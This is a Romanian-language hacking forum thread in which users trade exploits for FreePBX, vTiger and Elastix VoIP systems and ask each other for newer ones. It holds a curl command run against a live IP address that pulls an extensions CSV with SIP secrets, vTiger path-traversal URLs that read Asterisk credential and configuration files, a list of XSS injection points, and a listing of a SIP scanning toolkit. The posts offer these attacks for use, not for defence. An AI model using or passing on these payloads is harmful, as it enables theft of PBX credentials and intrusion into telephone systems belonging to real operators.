freePBX vTiger Elastix bug-uri si vulnerabilitati.

[k4570r3x]

[root@www ~]# curl -k -O https://177.43.52.102/modules/extensions_batch/libs/download_csv.php;cat download_csv.php

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

100 463 100 463 0 0 266 0 0:00:01 0:00:01 --:--:-- 452k

"Display Name","User Extension","Direct DID","Outbound CID","Call Waiting","Secret","Voicemail Status","Voicemail Password","VM Email Address","VM Pager Email Address","VM Options","VM Email Attachment","VM Play CID","VM Play Envelope","VM Delete Vmail","Context"

"Aeroporto","8451","","8451","DISABLED","8451","disable","","","","","no","no","no","no","ramais_sip"

"Blumenau","8470","","","DISABLED","8470","disable","","","","","no","no","no","no","ramais_sip"

ceva mai nou ca asta?

[k4570r3x]

https://ip/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/asterisk/sip_registrations.conf%00

https://ip/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00

aveti ceva exploiti noi functionali? paste aici

Edited May 20, 2012 by k4570r3x

[k4570r3x]

[root@smento fssl2]# ls

a g3t sip.info unknown.servers

bios.txt get start vuln

cmd.servers get.py syn www-authenticate.servers

core known.servers thread.pl x

download_csv.php sip-www.info tst_curl.php

[root@smento fssl2]#

[k4570r3x]

care sti ma ceva nou? asta cu XSS

SS (2.9.0 and perhaps other versions):

[HOST]/panel/index_amp.php?context=[XSS]

[HOST]/panel/flash/mypage.php?clid=[XSS]

[HOST]/panel/flash/mypage.php?clidname=[base64_encode(XSS)]

[HOST]/panel/dhtml/index.php?context=/../%00">[XSS]

[HOST]/admin/views/freepbx_reload.php/"</script>[XSS]

[HOST]/recordings/index.php?login='>[XSS]

vreau si eu un tutorial cum le ia pastea cu XSS

[peleme]

Nu te baga nimeni in seama si tot continui sa faci pe nebunu...

Ce postezi tu aici sunt buguri de acum 414 ani.

Parca te laudai pe mirc la "baieti" ca tu nu folosesti scannere si spargi numai prin mysql.

Ete ca te-am prins

A ... si altceva... postand aici niste buguri vechi de cand lumea... crezi ca vei obtine de la cineva ceva mai nou sa mai faci si tu 50 de dolari ?

Edited May 21, 2012 by peleme

[Guest Kovalski]

k4570r3x, citeste regulile prima data!

REGULI

ai facut 4 posturi consecutive.

Edited May 21, 2012 by ps-axl

[AhEaD]

Lol.

[mandeamarian]

A ... si altceva... postand aici niste buguri vechi de cand lumea... crezi ca vei obtine de la cineva ceva mai nou sa mai faci si tu 50 de dolari ?

Stai cuminte ca inca se fac bani, 50$ fac aia care nu "muncesc"

[peleme]

E na.. serios mariane ?

[k4570r3x]

ce de frustrari ) peleme ? suferi de vreo boala? vezi ca sunt din 2012 lunile trecute , fac pariu ca nu sti cum te numesti cu buletinu in fatza , iar eu nu fac lovele din ele, doar nu am ce face , te oftici?

dupa cum poti observa are peste 200 de vizualizari acest post , nu mai fi frustrat fa o la.. , scapa de plictiseala cumva, daca nu te duce capu sa faci altceva mui...e .

iar despre laudat pe unde ma laud eu , e treaba mea , sti cum le zice la astia care duc vorba dntr-o parte in alta? mancatori de shit , shit-ule.

Edited May 28, 2012 by k4570r3x

[randomm23]

mai exista ceva nou cu vTiger ? foloseste cineva

[randomm23]

http://www.exploit-db.com/exploits/27279/

a folosit cineva asta?

Edited November 2, 2013 by randomm23

[randomm23]

daca are cineva fssl2, sau e in tema cu mancarea asta de peste, astept pm, multumesc anticipat

[fedorffixxzz]

... mda, se pare ca nimeni nu mai citeste thread-ul asta de acum catva timp.

poza inca e valabila aici

[randomm23]

lol..

[Flubber]

Poftiti aici; acum trimiteti companiile catre noi sa apeleze la serviciile noastre.

[randomm23]

ce sa poftim.. linkuri d-acum "cinspe" ani, posteaza ceva folositor daca ai.